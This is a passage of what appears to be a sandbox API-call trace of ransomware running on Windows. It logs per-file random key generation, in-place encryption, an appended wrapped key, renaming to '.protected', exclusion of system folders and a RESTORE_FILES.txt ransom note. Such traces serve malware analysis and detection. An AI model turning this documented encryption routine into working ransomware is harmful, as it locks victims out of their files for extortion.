HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.protected")) returned 1 [0088.554] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Windows") returned -1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Program Files") returned -1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", 
lpString2="Program Files (x86)") returned -1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="$Recycle.bin") returned 1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="System Volume Information") returned -1 [0088.554] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0088.554] StrStrIW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".protected") returned 0x0 [0088.554] lstrcmpW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="RESTORE_FILES.txt") returned -1 [0088.554] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.554] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0088.558] StrStrW 
(lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".txt") returned 0x0 [0088.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0088.558] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".rar") returned 0x0 [0088.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0088.558] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".zip") returned 0x0 [0088.558] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.562] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.562] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.562] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.562] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.562] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 
lpOverlapped=0x0) returned 1 [0088.562] CloseHandle (hObject=0x150) returned 1 [0088.562] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.protected") returned 161 [0088.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.protected")) returned 1 [0088.563] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Windows") returned -1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Program Files") returned -1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Program Files (x86)") returned -1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="$Recycle.bin") returned 1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="System Volume Information") returned -1 [0088.563] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0088.563] StrStrIW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".protected") returned 0x0 [0088.563] lstrcmpW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="RESTORE_FILES.txt") returned -1 [0088.563] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0088.564] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".txt") returned 0x0 [0088.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0088.564] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", 
lpSrch=".rar") returned 0x0 [0088.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0088.564] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".zip") returned 0x0 [0088.564] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x59d, lpOverlapped=0x0) returned 1 [0088.587] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.587] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x59d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x59d, lpOverlapped=0x0) returned 1 [0088.587] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.587] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.587] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.588] CloseHandle (hObject=0x150) returned 1 [0088.588] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.protected") returned 161 [0088.588] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.protected")) returned 1 [0088.589] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Windows") returned -1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files") returned -1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files (x86)") returned -1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="$Recycle.bin") returned 1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="System Volume Information") returned -1 [0088.589] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0088.589] StrStrIW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".protected") returned 0x0 [0088.589] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="RESTORE_FILES.txt") returned -1 [0088.589] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.589] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0088.590] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0088.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0088.590] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".rar") returned 0x0 [0088.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0088.590] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".zip") returned 0x0 [0088.590] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0088.593] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.593] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0088.594] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.594] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.595] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.595] CloseHandle (hObject=0x150) returned 1 [0088.595] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.protected") returned 128 [0088.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.protected")) returned 1 [0088.596] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Windows") returned -1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", 
lpString2="Program Files") returned -1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Program Files (x86)") returned -1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="$Recycle.bin") returned 1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="System Volume Information") returned -1 [0088.596] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0088.596] StrStrIW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".protected") returned 0x0 [0088.596] lstrcmpW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="RESTORE_FILES.txt") returned -1 [0088.596] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.596] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0088.597] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".txt") returned 0x0 [0088.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0088.597] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".rar") returned 0x0 [0088.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0088.597] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".zip") returned 0x0 [0088.598] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5e0, lpOverlapped=0x0) returned 1 [0088.605] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.605] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5e0, lpOverlapped=0x0) returned 1 [0088.605] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.605] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.605] WriteFile (in: hFile=0x150, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.605] CloseHandle (hObject=0x150) returned 1 [0088.606] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.protected") returned 161 [0088.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.protected")) returned 1 [0088.606] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Windows") returned -1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Program Files") returned -1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="Program Files (x86)") returned -1 [0088.606] lstrcmpiW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="$Recycle.bin") returned 1 [0088.606] lstrcmpiW 
(lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="System Volume Information") returned -1 [0088.607] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0088.607] StrStrIW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".protected") returned 0x0 [0088.607] lstrcmpW (lpString1="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpString2="RESTORE_FILES.txt") returned -1 [0088.607] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.607] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 